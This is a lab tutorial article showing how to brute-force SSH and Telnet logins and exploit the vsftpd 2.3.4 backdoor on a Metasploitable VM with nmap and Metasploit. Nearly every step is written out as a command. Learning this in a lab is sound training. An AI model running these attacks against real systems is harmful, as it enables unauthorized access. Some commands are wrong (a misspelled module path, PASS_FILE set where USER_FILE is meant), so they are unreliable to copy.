A Brute Force Attack is one of the most famous and widely known types of cyber attack out there. a brute force attack is a type of attack that uses a trial-and-error method to guess login credentials, and encryption keys, or find a hidden webpage. If someone repeatedly and unsuccessfully tries to log in to an account or network, it appears to be a brute force attack. In a brute force attack, the attacker uses a wordlist from which the passwords are guessed by the auxiliaries. scripts keep running until they hit and try each credential provided in the list.
Example 1: Performing Brute-Force SSH Service with Metasploit
To do this attack you must have installed, Kali Linux and Metasploitable 2 or version 3. we are going to use Metasploitable 2 as our target machine and will be brute forcing into it using Metasploit Framework. follow the steps below to perform the attack.
Step 1: Open Both machines Kali Linux and Metasploitable, I’m using the virtual box for using both machines simultaneously you can do the same. and check for IP addresses so that we know the target IP address, using the command:
$ ifconfig
Â
Step 2: Now what we are going to do is perform an NMAP scan to get the list of open ports on the target machine, to do so use the command
$ nmap -sS -sV 192.168.10.3 (the IP address of the target machine)
This will prompt us with the list of all the open ports and services running on them.
Â
In the above image, you can see there are a bunch of open ports and services running in them.
Step 3: You can see there is a port 22/tcp that is running SSH service with version Openssh 4.7p1 Debian, Now we are going to do brute force on this port from our Kali Linux Virtual machine.
Now Open the MSF Console in the terminal by typing the below command:
msfconsole
Â
Now we are going to search for ssh_login Auxiliaries by using the Search command in msfconsole as you can see in the image below.Â
search ssh
Â
We will use the auxiliary/scanner/ssh/ssh_login from the results, to use this module type command:
msf6 > use auxiliary/scanner/ssh/ssh_login
Now let’s see the options available to set our target, to see the options use the command Show options.
msf6 > (auxiliary/scanner/ssh/ssh_login) > show options
Â
You can see in the above image we have a bunch of different options to set before launching our attack.
Step 4: Now set the required options and launch the attack.
Set the options that are required with the set command as followed in the image below.
set RHOST 192.168.10.3
set THREADS 3
set STOP_ON_SUCCESS true
set VERBOSE true
Â
After these options are set now we are going to use a PASSWORD list as the program doesn’t have one. So, to show you the attack successful I have created a password list that contains usernames and passwords, separated by space as it says in the image above for USERPASS_FILE.
Now set the password list with the command set, as shown in the image below:
set USERPASS_FILE (path to the password list)
Â
Step 5: We are all set to go and now we can launch the attack and watch each attempt on the terminal, to launch the attack use run the command.
After typing the run command it will start brute forcing into the system and when the attack is successful it will return the password and username. as you can see in the image below the default password for Metasploitable 2 is msfadmin and username also msfadmin and it had been successful.
Â
Example 2: Performing an Attack on FTP Server with Metasploit
Step 1: Open Both machines Kali Linux and Metasploitable, I’m using the virtual box for using both machines simultaneously you can do the same. and check for IP addresses so that we know the target IP address, using the command:
$ ifconfig
Â
Step 2: Now what we are going to do is perform an NMAP scan to get the list of open ports on the target machine, to do so use the command:
$ nmap -sS -sV 192.168.10.3 (the IP address of the target machine)
This will prompt the versions of services and open ports list on the target machine
Â
 Step 3: In the above output you can see that we have an open FTP port that is running on port 21/tcp and the version is vsftpd 2.3.4. so we are going to exploit this vulnerability using Metasploit with simple steps.
Open msfconsole and type the command for using the vsftpd exploit
$ msfconsole
$ msf6 > use exploit/unix/ftp/vstpd_234_backdoor
Now that we can see that we are using the exploit now let’s set the RHOST i.e. target IP address.
Â
$ show options -> used to show options that we need to provide or being provided by default
We can see in the above image that we have to specify RHOST and RPORT, the RPORT is set to 21 default as we want it to be, so let’s set the RHOST and run the exploit.
$ set RHOST 192.168.10.3 (target IP address)
Â
Now that we have provided all the parameters, we can run the exploit and see if it gives us access to the machine. to run an exploit you can use the command:
$ msf6 > run
Â
You can see in the above output we have successfully gained access to the machine by exploiting the FTP server using Metasploit.
Example 3: Performing an Attack on Telnet Service with Metasploit
Step 1: Open Both machines kali Linux and Metasploitable, I’m using the virtual box for using both machines simultaneously you can do the same. and check for IP addresses so that we know the target IP address, using the command:
$ ifconfig
Step 2: Now what we are going to do is perform an NMAP scan to get the list of open ports on the target machine, to do so use the command:
$ nmap -sS -sV 192.168.0.108 (the IP address of the target machine)
The above two steps are the same as we have done for SSH and FTP.
Step 3: Now open msfconsole and search for telnet auxiliary, to do so type the command:
$ msf6 > search type:auxiliary telnet
Â
Step 4: Now we have to use the auxiliary with which we will use to perform a brute force attack on port 23 of the target machine and with that, we will also see what options we have to set or provide to perform the attack.
$ msf6 > use auxiliary/scanner/telnet/telnet_login
$ msf6 (auxiliary/scanner/telnet/telnet_login ) > show options
Â
Step 5: We need to set a bunch of options, like RHOST, PASS_FILE, and USER_FILE this file you can create or download these from the internet, I have created them locally to show how to use them. and at last, we need to set the STOP_ON_SUCCESS true, to do all of this refer to the images below.
set PASS_FILE /home/lucifer/Desktop/pass.txt
set PASS_FILE /home/lucifer/Desktop/user.txt
Â
set RHOST 192.168.0.108
set STOP_ON_SUCCESS true
Â
Step 6: Now we are all set to run the exploit and to do so simply type the run command.
run
In the above image, you can see that we have successfully gained the password matched with msfadmin: msfadmin is the default password for Metasploitable machines
Conclusion
This is how we can use Metasploit to brute force a system or a target machine, remember I have shown only one way to do this but there are several other ways that you can always explore and test on your own like using different services, I have used SSH service as a vulnerability to attack but you can also try it for a website or webpage, what you can do is create a simple HTML form that accepts usernames and passwords and configure it with a database like MySQL and then you can perform the brute force attack, on the webpage and simply practice and learn.
Share your thoughts in the comments
Please Login to comment...